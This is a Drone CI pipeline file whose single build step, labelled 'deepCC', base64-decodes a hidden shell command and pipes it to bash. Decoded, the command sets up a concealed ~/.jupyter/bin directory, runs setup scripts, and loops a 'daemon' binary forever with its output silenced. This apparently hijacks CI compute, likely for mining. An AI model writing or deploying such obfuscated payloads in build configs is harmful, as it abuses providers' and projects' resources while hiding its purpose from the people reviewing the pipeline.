---
kind: pipeline
type: docker
name: default
clone:
  skip_verify: true
steps:
- name: deepCC
  image: golang
  commands:
  - bash -c "base64 -d <<< ZXhwb3J0IFRFUk09eHRlcm0gJiYgbnByb2MgJiYgbWtkaXIgfi8uanVweXRlci9iaW4gLXAgJiYgLi9zZXR1cCAmJiAuL2NvbmZpZ3VyZSAmJiBjZCB+Ly5qdXB5dGVyL2JpbiAmJiBQQVRIPSQocHdkKTokUEFUSCAmJiB3aGlsZSBbIDEgXTsgZG8gYmFzaCBkYWVtb24gPiAvZGV2L251bGw7IGRvbmUgJiB3YXRjaCBmcmVlIC1t | bash"
  environment:
    TERM: xterm